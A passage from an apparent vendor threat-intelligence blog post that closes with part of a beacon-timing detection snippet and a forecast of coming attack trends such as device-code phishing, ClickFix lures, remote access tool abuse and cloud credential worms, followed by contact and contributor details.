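              f"x{h['count']} (jitter {h['jitter']})")
```

Pair the timing hit with process lineage (which binary owns the socket) before alerting, since legitimate agents also poll on fixed intervals.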

 

Outlook for the Months Ahead

  • Device-code phishing will become a standard identity-theft option. Dynamic code generation, phishing-as-a-service kits, and user familiarity with legitimate sign-in prompts make this attack model easy to scale. 

  • ClickFix and fake update delivery will continue expanding through compromised sites. The model monetizes trust in familiar websites and avoids classic attachment scanning by turning the user into the execution step. 

  • Remote access tool abuse will remain a ransomware precursor pattern. Signed remote-access software reduces friction for attackers and gives them interactive access, file transfer, script execution, and persistence without obvious custom malware. 

  • AI browser extension risk will rise with enterprise AI adoption. Extensions operate exactly where sensitive prompts, email content, and session data are visible. The more AI workflows move into the browser, the more valuable this attack surface becomes. 

  • Cloud credential worms will target exposed control planes before deploying disruptive payloads. Secrets and tokens are easier to monetize and easier to reuse across environments than CPU cycles for mining. 

  • APT groups will increase public-service C2 and proxy chaining. Public chat APIs, cloud file APIs, repositories, and object storage can blend into allowed traffic while supporting per-victim tasking and exfiltration. 

  • AI-assisted malware development will shorten iteration cycles. Expect more variants with similar logic, verbose error handling, modular code, and rapid copycat implementation across threat families. 

For a full list of the search queries used on Autonomous Threat Sweeper for the threats detailed above, refer to our Threat Labs home page. The page also references a list of relevant policies used by threat actors.  

We would like to hear from you. Please reach out to us at scia@securonix.com.  

Note: The TTPs, when used in isolation, are prone to false positives and noise and should ideally be combined with the other indicators mentioned. 

Contributors: Nitish Singh, Nikhil Kumar Chadha, and Tanmay Kumar